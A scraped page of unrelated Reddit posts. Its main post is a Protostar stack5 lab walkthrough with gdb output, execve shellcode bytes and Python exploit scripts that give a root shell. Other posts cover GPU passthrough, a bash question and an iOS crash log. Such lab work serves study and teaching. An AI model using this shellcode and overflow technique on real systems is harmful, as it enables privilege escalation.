Binary-Dec.com - Hex to Decimal, Binary, Octal Converter

The official placiibo app subreddit!

The current purpose of this subreddit is to discuss the developments of the placiibo TestFlight and gathering beta feedback.
[link]

A place to help anyone who has a uterus

This sub is dedicated to providing information and resources to those in need of services in states that have passed the heartbeat bill. Please read the info in the sidebar 💖
[link]

Protostar stack5 shellcode not working in the buffer (outside is ok)

Protostar Stack5 buffer overflow (32 bits shellcode)
I got a strange behaviour (strange maybe not BUT that I could not explain :-)
When I put the shellcode inside the buffer it does not work but when outside all is working fine.
It's protostart stack5 binary in it's original VM (constructed from Iso on linux 32 bits) so I would not give further info on the binary itself (stack is executable, ASLR is off, ....)
Let me explain and let's go with gdb !

Finding the buffer overflow
gdb$ disass _start Dump of assembler code for function _start: 0x08048310 <_start+0>: xor ebp,ebp 0x08048312 <_start+2>: pop esi 0x08048313 <_start+3>: mov ecx,esp 0x08048315 <_start+5>: and esp,0xfffffff0 0x08048318 <_start+8>: push eax 0x08048319 <_start+9>: push esp 0x0804831a <_start+10>: push edx 0x0804831b <_start+11>: push 0x80483e0 0x08048320 <_start+16>: push 0x80483f0 0x08048325 <_start+21>: push ecx 0x08048326 <_start+22>: push esi 0x08048327 <_start+23>: push 0x80483c4 # Real Entry point 0x0804832c <_start+28>: call 0x80482f8 <[email protected]> 0x08048331 <_start+33>: hlt 0x08048332 <_start+34>: nop 0x08048333 <_start+35>: nop (....) 
let's disass main
gdb$ disass main Dump of assembler code for function main: 0x080483c4 : push ebp # Prologue... 0x080483c5 : mov ebp,esp # ... 0x080483c7 : and esp,0xfffffff0 # ... adress alignement 0x080483ca : sub esp,0x50 # ... reserve space on stack 0x080483cd : lea eax,[esp+0x10] # adress start of buffer 0x080483d1 : mov DWORD PTR [esp],eax # put the arg on the stack 0x080483d4 : call 0x80482e8 [email protected] # call to gets (char*) 0x080483d9 : leave 0x080483da : ret End of assembler dump. 
Let's retrieve EBP adress and value:
gdb$ x/wx $ebp 0xbffff7b8: 0xbffff838 

Let's retrieve EIP address and it's value
gdb$ x/wx $ebp+0x4 0xbffff7bc: 0xb7eadc76 
Let's check EIP return adress to be sure we're fine:
gdb$ x/5i 0xb7eadc76 0xb7eadc76 <__libc_start_main+230>: mov DWORD PTR [esp],eax 0xb7eadc79 <__libc_start_main+233>: call 0xb7ec60c0 <*__GI_exit> 0xb7eadc7e <__libc_start_main+238>: xor ecx,ecx 0xb7eadc80 <__libc_start_main+240>: jmp 0xb7eadbc0 <__libc_start_main+48> 0xb7eadc85 <__libc_start_main+245>: mov eax,DWORD PTR [ebx+0x37d4] 
Good ! It's back on __libc_start_main.

Let's get the buffer (gets) start adress :
p/x $esp+0x10 $1 = 0xbffff770 

Write the most important values for our exploitation:
---Reminder------------------------------------------------------- RET EBP : 0xbffff7b8: 0xbffff838 RET EIP : 0xbffff7bc: 0xb7eadc76 buffer start adress: 0xbffff770 ----------------------------------------------------------------- 
Let's do some computation to overwrite EIP
# EIP's address - buffer's address # gdb$ p/d 0xbffff7bc - 0xbffff770 # $1 = 0x76 
We need 76 bytes then we can start to overwrite EIP ( + 4 byte for EIP )
python -c 'print "A"*72 + "BBBB" + "CCCC"' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC 
A is Padding B is EBP C is EIP

Let's try our buffer overflow !
./stack5 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC dmesg [50576.044013] stack5[13898]: segfault at 43434343 ip 43434343 sp bffff7e0 error 4 
EIP has been overwritten and it is working fine (43 in ASCII => 'C') !

Shellcode Exploitation
We will use a well known and working shellcode :
https://security.stackexchange.com/questions/73878/program-exiting-after-executing-int-0x80-instruction-when-running-shellcode
shellcode is 58 bytes. We will construct our payload like that:
5 (NOP) + 58 (Shellcode) + 9 (PADDING-NOP) + 4 (EBP) + 4 (EIP) = 76 + 4 EIP bytes as computed 
Important : here I put the shellcode IN the buffer
r <<< $(python -c 'print "\x90"*5 + "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*9 + "\x38\xf8\xff\xbf" + "\x70\xf7\xff\xbf"') 
\x38\xf8\xff\xbf = EBP original adress = 0xbffff838
\x70\xf7\xff\xbf = overwritten EIP= buffer start adress = 0xbffff770

In GDB break juste before the ret instruction and check esp to be sure it will jump where we want
gdb$ x/wx $esp 0xbffff7bc: 0xbffff770 
Well this good for the next eip adress ! check to see if our shellcode is always there
x/30i 0xbffff770 0xbffff770: nop 0xbffff771: nop 0xbffff772: nop 0xbffff773: nop 0xbffff774: nop 0xbffff775: add esp,0x10 0xbffff778: xor eax,eax 0xbffff77a: xor ebx,ebx 0xbffff77c: mov al,0x6 0xbffff77e: int 0x80 0xbffff780: push ebx 0xbffff781: push 0x7974742f 0xbffff786: push 0x7665642f 0xbffff78b: mov ebx,esp 0xbffff78d: xor ecx,ecx 0xbffff78f: mov cx,0x2712 0xbffff793: mov al,0x5 0xbffff795: int 0x80 0xbffff797: xor eax,eax 0xbffff799: push eax 0xbffff79a: push 0x68732f2f 0xbffff79f: push 0x6e69622f 0xbffff7a4: mov ebx,esp 0xbffff7a6: push eax 0xbffff7a7: push ebx 0xbffff7a8: mov ecx,esp 0xbffff7aa: cdq 0xbffff7ab: mov al,0xb 0xbffff7ad: int 0x80 0xbffff7af: nop 
On GDB Perfect it is working !
gdb$ c Executing new program: /bin/dash $ 
out of GDB it is NOT working anymore:
same payload than in gdb
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*9 + '\x38\xf8\xff\xbf' + '\x70\xf7\xff\xbf')";) | ./stack5 
or (overwrite EBP)
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*13 + '\x70\xf7\xff\xbf')";) | ./stack5 
The only thing I get : Illegal instruction! Here a strace if it can help ...
execve("./stack5", ["./stack5"], [/* 16 vars */]) = 0 brk(0) = 0x804a000 fcntl64(0, F_GETFD) = 0 fcntl64(1, F_GETFD) = 0 fcntl64(2, F_GETFD) = 0 access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=13796, ...}) = 0 mmap2(NULL, 13796, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fdc000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320m\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1319176, ...}) = 0 mmap2(NULL, 1329480, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e97000 mprotect(0xb7fd5000, 4096, PROT_NONE) = 0 mmap2(0xb7fd6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13e) = 0xb7fd6000 mmap2(0xb7fd9000, 10568, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd9000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e96000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e966c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7fd6000, 8192, PROT_READ) = 0 mprotect(0xb7ffe000, 4096, PROT_READ) = 0 munmap(0xb7fdc000, 13796) = 0 fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000 read(0, "\220\220\220\220\220\203\304\0201\3001\333\260\6\315\200Sh/ttyh/dev\211\3431\311f"..., 4096) = 80 read(0, "", 4096) = 0 --- SIGILL (Illegal instruction) @ 0 (0) --- +++ killed by SIGILL +++ Illegal instruction 
Questions / Others informations
I know there could be some adress change caused by ENVs vars but I do not think that is the problem... but I have no evidence.

Just for the exemple Shellcode After EIP (outside the buffer) : everything is OK
[email protected]:/opt/protostabin$ (python -c "import sys; sys.stdout.write('\x90'*76 + '\xc0\xf7\xff\xbf' + '90'*10 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')";) | ./stack5 # whoami root 

EDIT :
I add python script exploit for reference :

Shellcode inside the buffer (not working)
import struct totalpad = 76 # Total bytes needed to start overwriting EIP NOP = "\x90" * 5 shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" EIP = struct.pack("I", 0xbffff770) nbpad = totalpad - len(NOP) - len(shellcode) PAD = 'A' * nbpad print NOP + shellcode + PAD + EIP 
Shellcode outside the buffer (working good)
import struct NOP1 = "\x90" * 76 EIP = struct.pack("I", 0xbffff7c0) NOP2 = "\x90" * 10 shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" print NOP1 + EIP + NOP2 + shellcode 
EDIT : shellcode inside the buffer is now working :-)
When executing outside gdb and attaching to the process I see that the start of the buffer is located at another memory adress.
So instead of hardcoding EIP start of buffer I use a register to jump to.
Hopefully there is one that hold the good adress: eax
Here is the working exploit of Shellcode inside the buffer:
import struct totalpad = 76 # Total bytes needed to start overwriting EIP # Little NOP Slide NOP = "\x90" * 2 # Shellcode maintaing / reopening stdin (for gets exploitation) shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" # Buffer start adress is 0xbfff770 but to hardcode adress is unreliable # EIP = struct.pack("I", 0xbffff770) # We will use a register to jump on the start of the buffer # We know debugging the program that eax contain the adress we want # We look with objdump -D stack5 -M intel | grep call | grep eax # 80483bf: ff d0 call eax # 804846b: ff d0 call eax # We have to adress that will call eax so that can trigger our exploit ! # EIP will call the adress that will "call eax" EIP = struct.pack("I", 0x80483bf) # We let EBP option either to rewrite trash or to use its original adress EBP = struct.pack("I", 0xbfff7b8) #EBP = "BBBB" nbpad = totalpad - len(NOP) - len(shellcode) - len(EBP) PAD = 'A' * nbpad # our payload print NOP + shellcode + PAD + EBP + EIP 
Usage :
$ python /home/usepython_exploits/stack5_inside_buffer.py | /opt/protostabin/stack5 # whoami root 
Stéphane
submitted by tequilaweb81 to LiveOverflow [link] [comments]

Cant passthrough RX 5700 XT

I was trying to passtrough my only gpu but there seems to be a problem with vfio.
CPU: Ryzen 1700X
GPU: Sapphire pulse rx 5700 xt
Mobo: Asus Rog strix X370-F
Bios options: SVM : Enabled, SR-IOV : Disabled
OS: arch , kernel 5.2.11-arch1-1-ARCH
Kernel parameters: "amd_iommu=on iommu=pt loglevel=3 quiet"

mkinitcpio.conf (comments are ommited)
MODULES=(vfio_pci vfio vfio_iommu_type1 vfio_virqfd) BINARIES=() FILES=() HOOKS=(base udev autodetect modconf block filesystems keyboard fsck) 
/etc/modprobe.d/vfio.conf
options vfio_pci ids=1002:731f,1002:ab38 
iommu groups
IOMMU Group 0: 00:01.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-1fh) PCIe Dummy Host Bridge [1022:1452] IOMMU Group 1: 00:01.1 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) PCIe GPP Bridge [1022:1453] IOMMU Group 10: 00:08.1 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Internal PCIe GPP Bridge 0 to Bus B [1022:1454] IOMMU Group 11: 00:14.0 SMBus [0c05]: Advanced Micro Devices, Inc. [AMD] FCH SMBus Controller [1022:790b] (rev 59) 00:14.3 ISA bridge [0601]: Advanced Micro Devices, Inc. [AMD] FCH LPC Bridge [1022:790e] (rev 51) IOMMU Group 12: 00:18.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 0 [1022:1460] 00:18.1 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 1 [1022:1461] 00:18.2 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 2 [1022:1462] 00:18.3 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 3 [1022:1463] 00:18.4 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 4 [1022:1464] 00:18.5 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 5 [1022:1465] 00:18.6 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 6 [1022:1466] 00:18.7 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Data Fabric: Device 18h; Function 7 [1022:1467] IOMMU Group 13: 01:00.0 Non-Volatile memory controller [0108]: Samsung Electronics Co Ltd NVMe SSD Controller SM981/PM981/PM983 [144d:a808] IOMMU Group 14: 02:00.0 USB controller [0c03]: Advanced Micro Devices, Inc. [AMD] X370 Series Chipset USB 3.1 xHCI Controller [1022:43b9] (rev 02) 02:00.1 SATA controller [0106]: Advanced Micro Devices, Inc. [AMD] X370 Series Chipset SATA Controller [1022:43b5] (rev 02) 02:00.2 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] X370 Series Chipset PCIe Upstream Port [1022:43b0] (rev 02) 03:00.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] 300 Series Chipset PCIe Port [1022:43b4] (rev 02) 03:02.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] 300 Series Chipset PCIe Port [1022:43b4] (rev 02) 03:03.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] 300 Series Chipset PCIe Port [1022:43b4] (rev 02) 03:04.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] 300 Series Chipset PCIe Port [1022:43b4] (rev 02) 03:06.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] 300 Series Chipset PCIe Port [1022:43b4] (rev 02) 03:07.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] 300 Series Chipset PCIe Port [1022:43b4] (rev 02) 04:00.0 USB controller [0c03]: ASMedia Technology Inc. ASM1142 USB 3.1 Host Controller [1b21:1242] 05:00.0 Ethernet controller [0200]: Intel Corporation I211 Gigabit Network Connection [8086:1539] (rev 03) IOMMU Group 15: 0a:00.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD/ATI] Device [1002:1478] (rev c1) IOMMU Group 16: 0b:00.0 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD/ATI] Device [1002:1479] IOMMU Group 17: 0c:00.0 VGA compatible controller [0300]: Advanced Micro Devices, Inc. [AMD/ATI] Navi 10 [Radeon RX 5700 / 5700 XT] [1002:731f] (rev c1) IOMMU Group 18: 0c:00.1 Audio device [0403]: Advanced Micro Devices, Inc. [AMD/ATI] Navi 10 HDMI Audio [1002:ab38] IOMMU Group 19: 0d:00.0 Non-Essential Instrumentation [1300]: Advanced Micro Devices, Inc. [AMD] Zeppelin/Raven/Raven2 PCIe Dummy Function [1022:145a] IOMMU Group 2: 00:01.3 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) PCIe GPP Bridge [1022:1453] IOMMU Group 20: 0d:00.2 Encryption controller [1080]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Platform Security Processor [1022:1456] IOMMU Group 21: 0d:00.3 USB controller [0c03]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) USB 3.0 Host Controller [1022:145c] IOMMU Group 22: 0e:00.0 Non-Essential Instrumentation [1300]: Advanced Micro Devices, Inc. [AMD] Zeppelin/Renoir PCIe Dummy Function [1022:1455] IOMMU Group 23: 0e:00.2 SATA controller [0106]: Advanced Micro Devices, Inc. [AMD] FCH SATA Controller [AHCI mode] [1022:7901] (rev 51) IOMMU Group 24: 0e:00.3 Audio device [0403]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) HD Audio Controller [1022:1457] IOMMU Group 3: 00:02.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-1fh) PCIe Dummy Host Bridge [1022:1452] IOMMU Group 4: 00:03.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-1fh) PCIe Dummy Host Bridge [1022:1452] IOMMU Group 5: 00:03.1 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) PCIe GPP Bridge [1022:1453] IOMMU Group 6: 00:04.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-1fh) PCIe Dummy Host Bridge [1022:1452] IOMMU Group 7: 00:07.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-1fh) PCIe Dummy Host Bridge [1022:1452] IOMMU Group 8: 00:07.1 PCI bridge [0604]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-0fh) Internal PCIe GPP Bridge 0 to Bus B [1022:1454] IOMMU Group 9: 00:08.0 Host bridge [0600]: Advanced Micro Devices, Inc. [AMD] Family 17h (Models 00h-1fh) PCIe Dummy Host Bridge [1022:1452] 
xml
 win10 facb7abd-ac3e-4a04-8e86-d6944b62d723      8388608 8388608 16  hvm /usshare/ovmf/x64/OVMF_CODE.fd /valib/libvirt/qemu/nvram/win10_VARS.fd                      destroy restart destroy      /usbin/qemu-system-x86_64     
Output of "dmesg | grep vfio" before starting vm
[ 1.279191] vfio-pci 0000:0c:00.0: vgaarb: changed VGA decodes: olddecodes=io+mem,decodes=io+mem:owns=io+mem [ 1.293682] vfio_pci: add [1002:731f[ffffffff:ffffffff]] class 0x000000/00000000 [ 1.310411] vfio_pci: add [1002:ab38[ffffffff:ffffffff]] class 0x000000/00000000 
full output: https://pastebin.com/UVaxAWWU

Output of "dmesg | grep vfio" after starting vm
[ 1.279191] vfio-pci 0000:0c:00.0: vgaarb: changed VGA decodes: olddecodes=io+mem,decodes=io+mem:owns=io+mem [ 1.293682] vfio_pci: add [1002:731f[ffffffff:ffffffff]] class 0x000000/00000000 [ 1.310411] vfio_pci: add [1002:ab38[ffffffff:ffffffff]] class 0x000000/00000000 [ 358.866916] vfio-pci 0000:0c:00.0: vfio_ecap_init: hiding ecap [email protected] [ 358.866927] vfio-pci 0000:0c:00.0: vfio_ecap_init: hiding ecap [email protected] [ 358.866930] vfio-pci 0000:0c:00.0: vfio_ecap_init: hiding ecap [email protected] [ 358.866931] vfio-pci 0000:0c:00.0: vfio_ecap_init: hiding ecap [email protected] [ 358.866933] vfio-pci 0000:0c:00.0: vfio_ecap_init: hiding ecap [email protected] [ 358.867808] vfio-pci 0000:0c:00.0: BAR 0: can't reserve [mem 0xe0000000-0xefffffff 64bit pref] [ 361.571367] vfio-pci 0000:0c:00.0: No more image in the PCI ROM [ 361.571388] vfio-pci 0000:0c:00.0: No more image in the PCI ROM 
full output: https://pastebin.com/VyxF9Y88

Since I only have one gpu I am forwarding X11 to a laptop and running virt-manager from there, windows starts and works fine but on my main display I only get a blinking cursor after starting the vm.

Edit: Thanks to u/cybervseas and this post https://www.reddit.com/VFIO/comments/7kpw33/cant_passthrough_boot_gpu_did_i_miss_something/ I got the vm working.
I added a line to the xml file that points to the rom file to be used. You can get that file from https://www.techpowerup.com/vgabios/ , download gpu-z and dump it or any other way to get the rom of your gpu.
    
The last thing was changing some settings in grub. I added the kernel parameter 'nofb' and changed GRUB_GFXPAYLOAD from 'keep' to 'text' in the file at /etc/default/grub.
Everything seems to work now I am writing this from inside the vm and I had no problems with the driver installation it works the same way as if windows was the host os.
submitted by diogo464 to VFIO [link] [comments]

Read binary data in a file?

I have some binary files which all have an ASCII string at the same offset, like this:
$ od -j 0x1000 -N 0x10 -c FILE1.BIN 0010000 S A M P L E - D A T A - 0 0 0 1 0010020 
Now I want to rename them according to the data, in this example, rename FILE1.BIN to SAMPLE-DATA-0001.BIN. However, there is no option for od to directly dump the ASCII text.
submitted by pthfdr to bash [link] [comments]

[question] Help needed with this crash report causes

Hello guys,
As I keep getting a random crashs on all apps with electra jailbreak and once I installed CrashReporter I found this report inside after re-Jailed again.
But i need help with someone can read it and tell me what is causing this issues.
{"blame":[],"app_name":"videosubscriptionsd","timestamp":"2018-11-03 07:55:50.79 +0300","app_version":"","slice_uuid":"4393dd09-05a7-3139-8605-28464675670a","build_version":"","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 11.3.1 (15E302)","incident_id":"CE901AAD-E319-40E8-A572-E674D4FBB746","name":"videosubscriptionsd","symbolicated":true} Incident Identifier: CE901AAD-E319-40E8-A572-E674D4FBB746 CrashReporter Key: 11a998859f78f5961f2b124614ee745209095758 Hardware Model: iPad6,4 Process: videosubscriptionsd [145] Path: /uslibexec/videosubscriptionsd Identifier: videosubscriptionsd Version: ??? Code Type: ARM-64 (Native) Role: Unspecified Parent Process: launchd [1] Coalition: com.apple.videosubscriptionsd [239]
Date/Time: 2018-11-03 07:55:50.0572 +0300 Launch Time: 2018-11-03 07:55:49.2131 +0300 OS Version: iPhone OS 11.3.1 (15E302) Baseband Version: 4.56.00 Report Version: 104
Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Subtype: KERN_INVALID_ADDRESS at 0x00000000143d47a0 VM Region Info: 0x143d47a0 is not in any region. Bytes before following region: 4035934304 REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL UNUSED SPACE AT START - __TEXT 0000000104ccc000-0000000104cd0000 [ 16K] r-x/r-x SM=COW ...ubscriptionsd
Termination Signal: Segmentation fault: 11 Termination Reason: Namespace SIGNAL, Code 0xb Terminating Process: exc handler [0] Triggered by Thread: 3
Filtered syslog: None found
Thread 0: 0 libsystem_kernel.dylib 0x1833dd634 0x1833bb000 + 0x22634 // __semwait_signal_nocancel + 0x8 1 libsystem_c.dylib 0x183303f38 0x1832e9000 + 0x1af38 // nanosleep$NOCANCEL + 0xd0 2 libsystem_c.dylib 0x183327700 0x1832e9000 + 0x3e700 // sleep$NOCANCEL + 0x2c 3 libdispatch.dylib 0x1832582f4 0x183247000 + 0x112f4 // _dispatch_queue_cleanup2 + 0x90 4 libsystem_pthread.dylib 0x18357c57c 0x18357b000 + 0x157c // _pthread_tsd_cleanup + 0x23c 5 libsystem_pthread.dylib 0x18357c2cc 0x18357b000 + 0x12cc // _pthread_exit + 0x58 6 libsystem_pthread.dylib 0x18357cb3c 0x18357b000 + 0x1b3c // pthread_exit + 0x2c 7 libdispatch.dylib 0x183255a08 0x183247000 + 0xea08 // _dispatch_worker_thread3 + 0x0 8 videosubscriptionsd (*) 0x104ccfb28 0x104ccc000 + 0x3b28 // 0x00003b28 + 0x0 9 libdyld.dylib 0x1832adfc0 0x1832ad000 + 0xfc0 // start + 0x4
Thread 1 name: Dispatch queue: com.apple.root.default-qos.overcommit Thread 1: 0 libsystem_kernel.dylib 0x1833dda00 0x1833bb000 + 0x22a00 // __sigsuspend_nocancel + 0x8 1 libdispatch.dylib 0x183258388 0x183247000 + 0x11388 // _dispatch_sigsuspend + 0x1c 2 libdispatch.dylib 0x18325836c 0x183247000 + 0x1136c // _dispatch_sigsuspend + 0x0
Thread 2 name: Dispatch queue: com.apple.NSXPCConnection.user.129 Thread 2: 0 libsystemkernel.dylib 0x1833dd0f4 0x1833bb000 + 0x220f4 // __psynch_cvwait + 0x8 1 libsystem_pthread.dylib 0x18357fc90 0x18357b000 + 0x4c90 // _pthread_cond_wait$VARIANT$mp + 0x284 2 Foundation 0x1842c5be8 0x184289000 + 0x3cbe8 // -[NSOperationInternal _waitUntilFinished:] + 0x30c 3 Foundation 0x184312100 0x184289000 + 0x89100 // -[NSOperationQueue waitUntilAllOperationsAreFinished] + 0x100 4 VideoSubscriberAccount 0x195e0847c 0x195dbb000 + 0x4d47c // -[VSSubscriptionPersistentContainer _performBlock:andWait:] + 0xbc 5 VideoSubscriberAccount 0x195df3760 0x195dbb000 + 0x38760 // -[VSSubscriptionRegistry _performBlockAndWait:] + 0x9c 6 VideoSubscriberAccount 0x195df4eec 0x195dbb000 + 0x39eec // -[VSSubscriptionRegistry fetchActiveSubscriptionsWithOptions:completionHandler:] + 0x1f8 7 Foundation 0x1844be960 0x184289000 + 0x235960 // __NSXPCCONNECTION_IS_CALLING_OUT_TO_EXPORTED_OBJECT_S2_ + 0x14 8 Foundation 0x1842bd6d8 0x184289000 + 0x346d8 // -[NSXPCConnection _decodeAndInvokeMessageWithEvent:flags:] + 0x97c 9 Foundation 0x1842dfac0 0x184289000 + 0x56ac0 // message_handler + 0xf0 10 libxpc.dylib 0x1835b7220 0x1835b2000 + 0x5220 // _xpc_connection_call_event_handler + 0x44 11 libxpc.dylib 0x1835b4bb4 0x1835b2000 + 0x2bb4 // _xpc_connection_mach_event + 0x3d8 12 libdispatch.dylib 0x183248bb4 0x183247000 + 0x1bb4 // _dispatch_client_callout4 + 0x10 13 libdispatch.dylib 0x18325f4c4 0x183247000 + 0x184c4 // _dispatch_mach_msg_invoke$VARIANT$mp + 0x160 14 libdispatch.dylib 0x1832528f0 0x183247000 + 0xb8f0 // _dispatch_queue_serial_drain$VARIANT$mp + 0x118 15 libdispatch.dylib 0x18325ff70 0x183247000 + 0x18f70 // _dispatch_mach_invoke$VARIANT$mp + 0x1fc 16 libdispatch.dylib 0x1832528f0 0x183247000 + 0xb8f0 // _dispatch_queue_serial_drain$VARIANT$mp + 0x118 17 libdispatch.dylib 0x183253380 0x183247000 + 0xc380 // _dispatch_queue_invoke$VARIANT$mp + 0x150 18 libdispatch.dylib 0x183253d4c 0x183247000 + 0xcd4c // _dispatch_root_queue_drain_deferred_wlh$VARIANT$mp + 0x154 19 libdispatch.dylib 0x18325c11c 0x183247000 + 0x1511c // _dispatch_workloop_worker_thread$VARIANT$mp + 0x29c 20 libsystem_pthread.dylib 0x18357be70 0x18357b000 + 0xe70 // _pthread_wqthread + 0x35c 21 libsystem_pthread.dylib 0x18357bb08 0x18357b000 + 0xb08 // start_wqthread + 0x4
